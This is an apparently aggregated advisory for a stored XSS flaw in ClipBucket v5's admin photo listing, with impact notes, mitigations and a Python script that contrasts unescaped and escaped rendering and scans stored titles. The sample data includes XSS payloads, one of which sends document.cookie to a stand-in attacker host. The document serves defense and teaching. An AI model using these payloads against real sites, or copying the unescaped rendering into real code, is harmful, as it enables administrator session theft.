
CVE-2025-64336: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MacWarrior clipbucket-v5

Severity: High
Tags: vulnerability, cve-2025-64336, cwe-79, cwe-269
Published: Fri Nov 07 2025 (11/07/2025, 04:32:10 UTC)
Source: CVE Database V5
Vendor/Project: MacWarrior
Product: clipbucket-v5

Description

ClipBucket v5 is an open source video sharing platform. In versions 5.5.2-#146 and below, the Manage Photos feature is vulnerable to stored Cross-site Scripting (XSS). An authenticated regular user can upload a photo with a malicious Photo Title containing HTML/JavaScript code. While the payload does not execute in the user-facing photo gallery or detail pages, it is rendered unsafely in the Admin → Manage Photos section, resulting in JavaScript execution in the administrator’s browser. This issue is fixed in version 5.5.2-#147.

AI-Powered Analysis

Last updated: 11/07/2025, 04:47:47 UTC

Technical Analysis

CVE-2025-64336 is a stored cross-site scripting (XSS) vulnerability in ClipBucket v5, an open source video sharing platform, affecting versions up to and including 5.5.2-#146. The weakness is improper neutralization of input during web page generation (CWE-79) in the Manage Photos feature. An authenticated regular user uploads a photo whose Photo Title contains HTML or JavaScript; the title is stored and later rendered under Admin → Manage Photos without output encoding, so the script runs in the administrator's browser. The same title does not execute in the public photo gallery or photo detail pages, which points to the root cause: the admin template emits the stored value unencoded, while the public-facing templates evidently encode it. The data is stored as submitted in both cases; what differs is the encoding at output.

Exploitation requires a valid low-privileged user account and an administrator subsequently opening the Manage Photos page, so there is a user-interaction dependency, but it is satisfied by routine moderation work. Once the page is viewed, the attacker's script executes with the administrator's session and can hijack that session or perform administrative actions in the administrator's name, including injecting further content. Because a regular user thereby obtains administrator capability, the issue is also tagged CWE-269 (Improper Privilege Management).

The CVSS 4.0 base score is 7.2 (high). As described, the attack is reachable over the network with low complexity, needs only a regular user account, depends on an administrator viewing the affected page, and has high impact on confidentiality and integrity. The CVE was reserved on 2025-10-30 and published on 2025-11-07. No exploitation in the wild has been reported. The issue is fixed in ClipBucket 5.5.2-#147.

Potential Impact

For European organizations running ClipBucket v5 before 5.5.2-#147, the primary risk is compromise of an administrator session and, through it, of the platform's backend. A script running in the administrator's browser can hijack the session or issue administrative requests directly, leading to content manipulation, exposure of user data, insertion of malicious content, or disruption of the service. Since the attack requires only an authenticated regular account, deployments with open self-registration or weak account verification are the most exposed; a public video site by design hands the attacker the account the attack needs.

The impact on confidentiality and integrity is high, because the attacker inherits whatever the administrator can see and change. Availability impact is lower but possible if administrative functions are abused to disrupt operations. Organizations hosting user-generated video (media companies, educational platforms, internal collaboration tools built on ClipBucket) are particularly exposed, and the risk increases where administrator access is loosely controlled or administrators are not alert to unexpected content in the admin interface.

No exploits in the wild have been reported. That lowers immediate risk but does not remove the threat: a working payload needs nothing beyond the HTML fragment in the photo title that the advisory describes, and the trigger is an administrator doing ordinary moderation. The issue is therefore well suited to targeted attacks against entities that rely on ClipBucket for content management.

Mitigation Recommendations

1. Upgrade to ClipBucket 5.5.2-#147 or later, where the vulnerability is patched. This is the only complete fix; everything below reduces exposure or blast radius.
2. Restrict the admin panel (Admin → Manage Photos included) to a VPN or an IP allowlist and require multi-factor authentication for administrator logins. These controls do not stop the stored payload from executing when a legitimate administrator opens the page; their value is that a session token exfiltrated by the script is of little use from outside the allowed network, and that a phished or guessed administrator password alone does not suffice. Also set the session cookie with the HttpOnly and SameSite attributes so the script cannot read it directly (it can still issue requests from within the administrator's browser).
3. Tighten user registration and verification, since the attack needs only a regular authenticated account.
4. Serve admin pages with a Content Security Policy whose script-src does not allow 'unsafe-inline' (use nonces or hashes). Such a policy blocks the inline event handlers that typical payloads rely on; expect the admin templates to need changes before a strict policy can be enforced without breaking the interface.
5. Train administrators to treat unexpected content, broken layout or unexplained prompts in the admin interface as a possible attack and to report it rather than dismiss it.
6. Review stored photo titles and upload logs for HTML markup, event-handler attributes or javascript: URLs, and identify the accounts that submitted them; a hit is an exploitation attempt whether or not the admin page has been viewed yet.
7. If patching cannot be done immediately, disable the Manage Photos feature or limit who may upload photos, and purge or neutralize malicious titles already in the database. Input-length limits and filtering of uploads at the web server or application firewall are stopgaps only: they are bypassable and do nothing about payloads already stored.
8. In custom deployments or forks, fix the underlying defect: HTML-encode the title (and every other user-controlled value) at the point of output in the admin templates, as the public templates evidently already do.
9. Deploy web application firewall rules that detect common XSS payloads in photo upload requests, with the limits noted in item 7 in mind.
10. Audit user and administrator privileges regularly so that administrator accounts, whose sessions are the target here, are as few and as tightly held as least privilege allows.
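The following Python script is an added example, not ClipBucket's own code, and illustrates two points from the technical analysis and from recommendations 6 to 8: the rendering defect (a stored title interpolated into the admin HTML as-is) beside the fix (HTML-encoding the value at output time), and a triage scan that flags stored titles containing markup so that existing payloads can be found and attributed to the uploading account before or after upgrading. The row shape (photo_id, userid, photo_title), the sample rows, the payloads and all function names are constructed for the example and are not taken from ClipBucket's schema or code.

```python
"""Stored XSS in an admin photo listing: vulnerable vs. encoded rendering,
plus a triage scan of stored photo titles.

Added example for CVE-2025-64336; this is not ClipBucket code. The row shape
(photo_id, userid, photo_title) and every sample title are constructed here.
"""
import html
import re
from collections import Counter

# Constructed sample rows standing in for a photos table. Rows 102 and 105 carry
# payloads of the kind the advisory describes; 104 shows that a bare "<" or "&"
# in ordinary text must be encoded on output but is not by itself a payload.
SAMPLE_PHOTOS = [
    (101, 7, "Sunset over the harbour"),
    (102, 9, "<img src=x onerror=alert(document.cookie)>"),
    (103, 9, "Holiday <b>photos</b>"),
    (104, 12, "5 < 6 and fish & chips"),
    (105, 9, "<svg/onload=fetch('//attacker.example/?c='+document.cookie)>"),
    (106, 4, "javascript:alert(1)"),
]


def render_admin_row_vulnerable(photo_id, title):
    """The defective pattern: the stored title goes into the HTML unchanged."""
    return f"<tr><td>{photo_id}</td><td>{title}</td></tr>"


def render_admin_row_fixed(photo_id, title):
    """Encode for the HTML text-node context at output time. html.escape turns
    & < > " ' into entities, so the browser renders text, not markup."""
    return f"<tr><td>{photo_id}</td><td>{html.escape(title, quote=True)}</td></tr>"


# Markup that has no business in a photo title. A tag must start with a letter,
# so "5 < 6" is not matched; an on* attribute or a javascript: URL is flagged
# even without a tag, since titles are sometimes reflected into attributes.
_TAG = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
_HANDLER = re.compile(r"\bon[a-zA-Z]+\s*=", re.IGNORECASE)
_JS_URL = re.compile(r"javascript\s*:", re.IGNORECASE)


def classify_title(title):
    """Return the list of rules a title trips; an empty list means nothing markup-like."""
    reasons = []
    if _TAG.search(title):
        reasons.append("html-tag")
    if _HANDLER.search(title):
        reasons.append("event-handler")
    if _JS_URL.search(title):
        reasons.append("javascript-url")
    return reasons


def scan_photo_titles(rows):
    """Return (photo_id, userid, reasons) for every row whose title trips a rule."""
    flagged = []
    for photo_id, userid, title in rows:
        reasons = classify_title(title)
        if reasons:
            flagged.append((photo_id, userid, reasons))
    return flagged


def suspicious_uploaders(flagged):
    """Count flagged titles per account, most prolific first, to guide follow-up."""
    return Counter(userid for _, userid, _ in flagged).most_common()


if __name__ == "__main__":
    payload = SAMPLE_PHOTOS[1][2]
    print("vulnerable:", render_admin_row_vulnerable(102, payload))
    print("fixed:     ", render_admin_row_fixed(102, payload))
    flagged = scan_photo_titles(SAMPLE_PHOTOS)
    for photo_id, userid, reasons in flagged:
        print(f"photo {photo_id} by user {userid}: {', '.join(reasons)}")
    print("uploaders to review:", suspicious_uploaders(flagged))
```

Running the script prints the raw and the encoded table row for the payload title, then the flagged rows and a per-account count. Two design points: the encoding in render_admin_row_fixed is for the HTML text-node context only, and a value reflected into an attribute or a script block needs the encoding appropriate to that context; and the scan is a review aid, not a filter, since no regular expression enumerates every XSS payload. Its purpose is to find what is already stored and who stored it, which a WAF in front of new uploads cannot do.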

Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2025-10-30T17:40:52.030Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 690d79bf3ea13e495ec0cafb

Added to database: 11/7/2025, 4:46:55 AM

Last enriched: 11/7/2025, 4:47:47 AM

Last updated: 11/7/2025, 7:01:35 PM